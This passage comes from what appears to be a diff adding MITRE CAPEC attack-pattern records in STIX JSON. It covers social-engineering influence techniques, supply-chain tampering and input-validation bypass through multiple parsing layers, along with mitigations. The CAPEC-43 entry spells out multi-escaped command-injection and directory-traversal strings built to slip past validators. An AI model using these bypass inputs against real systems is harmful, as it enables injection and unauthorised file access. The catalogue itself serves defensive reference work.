"relationship--5f246e08-06d0-46f0-a49f-061d90062966", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0dff928-51e9-432a-adb9-1dd4d3008256", + "target_ref": "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary incites a behavior from the target by manipulating something of influence. 
This is commonly associated with financial, social, or ideological incentivization. Examples include monetary fraud, peer pressure, and preying on the target's morals or ethics. The most effective incentive against one target might not be as effective against another, therefore the adversary must gather information about the target's vulnerability to particular incentives.", + "external_references": [ + { + "external_id": "CAPEC-426", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/426.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence via Incentives", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity 
of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the incentives that would influence the actions of the specific target." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6433a46-1658-4501-a2d5-69157cd29ad6", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary shapes the target's actions or behavior by focusing on the ways human interact and learn, leveraging such elements as cognitive and social psychology. 
In a variety of ways, a target can be influenced to behave or perform an action through capitalizing on what scholarship and research has learned about how and why humans react to specific scenarios and cues.", + "external_references": [ + { + "external_id": "CAPEC-427", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/427.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence via Psychological Principles", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + 
"x_capec_parent_of_refs": [ + "attack-pattern--6297aac6-1e4d-4c28-9268-52f70584ec5b", + "attack-pattern--bbd4f017-9a98-495c-889f-68d85aca375a", + "attack-pattern--6d30ec21-b3b4-435d-9045-acd660865e6a", + "attack-pattern--c207660b-d5b1-4928-b472-251f19a094d0", + "attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c110197f-03b6-4bd2-8fc6-22c90a73c5e9", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary tailors their communication to the language and thought patterns of the target thereby weakening barriers or reluctance to communication. This method is a way of building rapport with a target by matching their speech patterns and the primary ways or dominant senses with which they make abstractions. This technique can be used to make the target more receptive to sharing information because the adversary has adapted their communication forms to match those of the target. 
When skillfully employed, the target is likely to be unaware that they are being manipulated.", + "external_references": [ + { + "external_id": "CAPEC-428", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/428.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--6297aac6-1e4d-4c28-9268-52f70584ec5b", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Influence via Modes of Thinking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary gains information via non-verbal means from the target through eye movements.", + "external_references": [ + { + "external_id": "CAPEC-429", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/429.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--bbd4f017-9a98-495c-889f-68d85aca375a", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Target Influence via Eye Cues", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + 
"attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a \"layer\" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: --> --> . 
In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.", + "external_references": [ + { + "external_id": "CAPEC-43", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/43.html" + }, + { + "external_id": "CWE-179", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/179.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploiting Multiple Input Interpretation Layers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The backslash character provides a good example of the multiple-parser issue. A backslash is used to escape characters in strings, but is also used to delimit directories on the NT file system. When performing a command injection that includes NT paths, there is usually a need to \"double escape\" the backslash. In some cases, a quadruple escape is necessary.\n Original String: C:\\\\\\\\winnt\\\\\\\\system32\\\\\\\\cmd.exe /c\n \n Interim String: C:\\\\winnt\\\\system32\\\\cmd.exe /c\n \n Final String: C:\\winnt\\system32\\cmd.exe /c\n This diagram shows each successive layer of parsing translating the backslash character. A double backslash becomes a single as it is parsed. By using quadruple backslashes, the attacker is able to control the result in the final string.\n [REF-1]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application/system inputs where bypassing input validation is desired: The attacker first needs to determine all of the application's/system's inputs where input validation is being performed and where they want to bypass it.

  2. Techniques
    While using an application/system, the attacker discovers an input where validation is stopping them from performing some malicious or unauthorized actions.

Experiment

  1. Determine which character encodings are accepted by the application/system: The attacker then needs to provide various character encodings to the application/system and determine which ones are accepted. The attacker will need to observe the application's/system's response to the encoded data to determine whether the data was interpreted properly.

  2. Techniques
    Determine which escape characters are accepted by the application/system. A common escape character is the backslash character, '\\'
    Determine whether URL encoding is accepted by the application/system.
    Determine whether UTF-8 encoding is accepted by the application/system.
    Determine whether UTF-16 encoding is accepted by the application/system.
    Determine if any other encodings are accepted by the application/system.
  3. Combine multiple encodings accepted by the application.: The attacker now combines encodings accepted by the application. The attacker may combine different encodings or apply the same encoding multiple times.

  4. Techniques
    Combine same encoding multiple times and observe its effects. For example, if special characters are encoded with a leading backslash, then the following encoding may be accepted by the application/system: \"\\\\\\.\". With two parsing layers, this may get converted to \"\\.\" after the first parsing layer, and then, to \".\" after the second. If the input validation layer is between the two parsing layers, then \"\\\\\\.\\\\\\.\" might pass a test for \"..\" but still get converted to \"..\" afterwards. This may enable directory traversal attacks.
    Combine multiple encodings and observe the effects. For example, the attacker might encode \".\" as \"\\.\", and then, encode \"\\.\" as \"\.\", and then, encode that using URL encoding to \"%26%2392%3B%26%2346%3B\"

Exploit

  1. Leverage ability to bypass input validation: Attacker leverages their ability to bypass input validation to gain unauthorized access to system. There are many attacks possible, and a few examples are mentioned here.

  2. Techniques
    Gain access to sensitive files.
    Perform command injection.
    Perform SQL injection.
    Perform XSS attacks.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "User input is used to construct a command to be executed on the target system or as part of the file name.", + "Multiple parser passes are performed on the data supplied by the user." + ], + "x_capec_skills_required": { + "Medium": "Knowledge of various escaping schemes, such as URL escape encoding and XML escape characters." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An iterative approach to input validation may be required to ensure that no dangerous characters are present. It may be necessary to implement redundant checking across different input validation layers. Ensure that invalid data is rejected as soon as possible and do not continue to work with it.", + "id": "course-of-action--809958b7-bafc-4845-87c4-cab53e86cb67", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-43-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1cce6424-2120-47d0-979c-8ee21cfa1e1a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--809958b7-bafc-4845-87c4-cab53e86cb67", + "target_ref": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure to perform input validation on canonicalized data (i.e. 
data that is data in its most standard form). This will help avoid tricky encodings getting past the filters.", + "id": "course-of-action--d94176ef-a1ff-499b-86b7-e94e8734ab6a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-43-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c2e5ce6d-7c06-4bf7-9b38-475351b97ad1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d94176ef-a1ff-499b-86b7-e94e8734ab6a", + "target_ref": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. 
Input that does not match against the allowlist would not be permitted to enter into the system.", + "id": "course-of-action--f0f8d5a1-d4cc-4eac-b405-4af5e4a821c6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-43-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--45fc127a-991a-47f3-a564-b96d95896f3c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0f8d5a1-d4cc-4eac-b405-4af5e4a821c6", + "target_ref": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-430", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/430.html" + } + ], + "id": "attack-pattern--8428f01f-d4ca-4fb0-866d-8d5716b36265", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Micro-Expressions", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-431", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/431.html" + } + ], + 
"id": "attack-pattern--76afdae0-2970-44dc-8ae0-fd04629b0dab", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Neuro-Linguistic Programming (NLP)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-432", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/432.html" + } + ], + "id": "attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Voice in NLP", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker utilizes a technique to insinuate commands to the subconscious mind of the target via communication patterns. The human buffer overflow methodology does not rely on over-stimulating the mind of the target, but rather embedding messages within communication that the mind of the listener assembles at a subconscious level. 
The human buffer-overflow method is similar to subconscious programming to the extent that messages are embedded within the message.", + "external_references": [ + { + "external_id": "CAPEC-433", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/433.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--6d30ec21-b3b4-435d-9045-acd660865e6a", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Target Influence via The Human Buffer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_extended_description": "\n The fundamental difference is that embedded messages have a complete semantic quality, rather than mere imagery, and the mind of the target tends to key off of particular dominant patterns. The remaining information, carefully structured, speaks directly to the subconscious with a subtle, indirect, command. The effect is to produce a pattern of thinking that the attacker has predetermined but is buried within the message and not overtly stated. 
Structuring a human \"buffer overflow\" requires precise attention to detail and the use of information in a manner that distracts the conscious mind from the message the subconscious is receiving.\n ", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "", + "external_references": [ + { + "external_id": "CAPEC-434", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/434.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--c207660b-d5b1-4928-b472-251f19a094d0", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via Interview and Interrogation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "", + "external_references": [ + { + "external_id": "CAPEC-435", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/435.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905", + "modified": 
"2014-06-23T00:00:00.000Z", + "name": "Target Influence via Instant Rapport", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. 
There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.", + "external_references": [ + { + "external_id": "CAPEC-438", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/438.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Marcus Sachs, Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization, Verizon, Inc.", + "external_id": "REF-380", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Thea Reilkoff, Hardware Trojans: A Novel Attack Meets a New Defense, 2010, Yale School of Engineering and Applied Science", + "external_id": "REF-381", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Modification During Manufacture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": 
[ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker undermines the integrity of a product, software, or technology at some stage of the distribution channel. The core threat of modification or manipulation during distribution arise from the many stages of distribution, as a product may traverse multiple suppliers and integrators as the final asset is delivered. Components and services provided from a manufacturer to a supplier may be tampered with during integration or packaging.", + "external_references": [ + { + "external_id": "CAPEC-439", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/439.html" + }, + { + "external_id": "CWE-1269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1269.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "SAFECode, The Software Supply Chain Integrity Framework Defining Risks and Responsibilities for Securing Software in the Global Supply Chain, 2009, Safecode.org", + "external_id": "REF-384", + "source_name": "reference_from_CAPEC" + }, + { + 
"description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Manipulation During Distribution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "A malicious OEM provider, or OEM provider employee or contractor, may install software, or modify existing code, during distribution.", + "External contractors involved in the packaging or testing of products or components may install software, or modify existing code, during distribution." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a buffer overflow vulnerability in the handling of binary resources. Binary resources may include music files like MP3, image files like JPEG files, and any other binary file. These attacks may pass unnoticed to the client machine through normal usage of files, such as a browser loading a seemingly innocent JPEG file. 
